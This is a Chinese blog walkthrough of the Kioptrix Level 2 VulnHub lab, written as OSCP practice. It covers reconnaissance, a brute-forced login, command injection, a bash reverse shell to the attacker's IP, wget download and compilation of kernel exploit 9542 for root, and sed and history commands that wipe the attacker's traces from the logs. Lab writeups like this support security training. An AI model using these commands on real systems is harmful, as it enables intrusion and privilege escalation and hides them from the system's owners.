oscp备战系列-KioptixLevel2

已于 2024-12-19 01:41:31 修改
阅读量1.4k 收藏 17
点赞数 42
文章标签: 学习 网络安全 安全
于 2024-12-10 23:10:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_72986003/article/details/144386136
版权

文章目录

一、信息收集

  1. 主机探测
nmap 192.168.30.0/24

img

  1. 指纹探测
nmap 192.168.30.192 -p 22,80,111,443,631,3306 -sV -sC -O --version-all
  1. 目录扫描
drib http://192.168.30.192
  1. 指纹识别
whatweb http://192.168.30.192

img

可以看到一个指纹信息 apache2.0.52,centos,php4.3.9

  1. 漏洞查询
searchsploit php apache

img

可以看到头两个符合版本,可以尝试

二、攻击

访问80端口

img

一个登录框,又开放了3306端口,尝试sql注入,抓包发现用户密码明文,直接上字典跑

img

img

img

进来之后好像也没啥,但是这个提示好像让我们ping机器,感觉输入框被隐藏了,查看html

img

可以看到有一段报红,可以看到报红处首行td标签的center处引号未闭合,然后接着下两行input标签就是输入框和提交按钮,得尝试修复闭合问题,才可以显示输入框和提交按钮

可以利用Burp发起请求然后抓取响应包

img

右键请求数据包,选择Do intercept 有一个response to this request,即拦截该请求包的响应包

img

拦截到后引号闭合处理再放行响应包

img

此时输入框成功显示,输入127.0.0.1

img

这不就是远程命令执行典型例子吗,尝试一波whoami

img

apache权限

直接尝试用bash反弹shell吧

kali上执行

nc -lnvp 4444

靶机输入框内输入

127.0.0.1 | bash -i >& /dev/tcp/192.168.30.176/4444 0>&1

img

成功反弹

三、提权

  1. 收集系统信息
uname -a
cat /etc/os-release
lsb_release -a

img

可以看到是Linux 2.6.9 CentOS4.5

  1. 漏洞利用脚本检索
searchsploit CentOS

img

复制脚本到当前目录

searchsploit -m 9542

img

  1. 编译运行exp
gcc 9542.c -o 9542
chmod +x 9542
./9542

img

出现报错

查看一下c文件

img

看了一圈,发现他没有指定目标机,直接开始本地提权,所以我们需要把脚本放到目标机

kali开启python网络服务

img

回到bash wget下载脚本

wget http://192.168.30.176/9542.c

img

发现当前目录没有写入权限,我们下载到/var/tmp目录下试试

cd /var/tmp
wget http://192.168.30.176:80/9542.c

img编译执行

img

成功提权

四、痕迹清除

  1. 中间件痕迹清除

主要是清除web访问日志,日志又分access.log和error.log

find / -name 'access*'

img

清除上图四个

img

可以看到有我kali攻击机的记录

再来cat /var/log/httpd/access_log

img

可以看到有我本机(192.168.30.1)的记录,有kali(192.168.30.176)记录,access_log.1,access_log.2也一样

执行清除命令

sed -i '/192.168.30.1/d' /var/log/cups/access_log
sed -i '/192.168.30.1/d' /var/log/httpd/access*

img

img

可以看到我的记录都清除了,access_log.2还有记录,但那不是我的

再来找一下error日志

find / -name 'error*'

img

查看cups下的错误日志

img

主要记录时间有2009年,有2024年,2024年就是本次的记录

查看/httpd下的错误日志

img

img

记录了两种,有时间有IP

执行清除命令

sed -i '/2024/d' /var/log/cups/error*
sed -i '/192.168.30.1/d' /var/log/httpd/error*
sed -i '/2024/d' /var/log/httpd/error*

img

  1. 文件清除
rm /var/tmp/9542*
  1. 命令历史记录清除
history -c

小白一个,有什么错误的地方望大佬指出

文章原创,欢迎转载,请注明文章出处

玖一柒
关注
Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 955
Kioptrix Level 2靶机wp
vulnhub之Kioptrix Level 2
li1136594919的博客
06-09 507
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机。
Kioptrix Level 2
最新发布
2303_76157831的博客
03-31 163
admin后的 ' 使原来的代码中的单引号进行闭合,再拼接 or '1'='1 达到万能密码的作用,“or”代表只要有一个条件为真整个语句就为真 ,我们在“or”后面构造 '1'='1 ,这样即使我们并不知道账号密码,但是“or”后方的 '1'='1 等式恒成立,(因为我们输入的账号为 admin' 已经提前手动闭合 ,所以,在代码中显示的完整版为 'admin' or '1'='1' )
渗透测试靶机---Kioptrix Level 2
久恙502的博客
07-19 311
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1309
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,6603306端口, 使用SearchSploit搜...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP-Cheat-Sheet:更加努力
03-05
【标题】"OSCP-Cheat-Sheet:更加努力"揭示了这个压缩包文件的主要内容,它是一个关于OSCP(Offensive Security Certified Professional)认证的学习备忘单,旨在帮助备考者更有效地准备考试。OSCP网络安全领域的一...
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的...
1-OSCP自学笔记-October靶机练习1
08-04
2. **端口扫描**: 使用`nmap`进行快速且高效的端口扫描,确定开放的服务。作者推荐了一个技巧,通过`nmap -p- --min-rate=1000 -sT -T4 IP_ADDRESS`快速扫描所有端口,然后使用`-sC -sV -p PORTS -sT IP_ADDRESS`...
黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2
ShadowBlade
08-16 2638
第三节内容讲述了Web命令注入漏洞原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 如果靶机部署有疑问,请留言! 1.信息收集 kali IP为192.168.17.4 发现靶机IP192.168.17.5 使用第二章nmap命令扫描靶机, nmap -p `nmap -p- --min-rate=10000 ..
Kioptrix Level 2入门级详细教程&小白也能看懂!
jockerboss的博客
02-27 1299
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
vuInhub靶场实战系列--Kioptrix Level #2
weixin_45221204的博客
06-09 1005
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #2靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、反弹shell、脚本利用、linux内核提权等内容。p=49Checksum主机发现目录扫描端口扫描netcat监听反弹shelllinux内核提权。
【Kioptrix_Level_2 靶机漏洞复现】
mmdlm的博客
09-11 1069
在KioptrixLevel2环境中,通过Nmap扫描发现目标主机,利用命令注入SQL注入漏洞进行渗透,最终实现反弹shell提权的过程,包括获取系统信息及本地提权漏洞利用。
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1449
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
Oscp备考-Kioptrix2
weixin_44126257的博客
09-16 2094
Oscp备考:Kioptrix Level 2
Vulnhub靶机Kioptrix Level 2 writeup
xingjinhao123的博客
01-09 1274
Vulnhub靶机Kioptrix Level 2渗透
KIOPTRIX: LEVEL 2通关详解
arcuied
04-02 286
KIOPTRIX: LEVEL 2通关详解
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值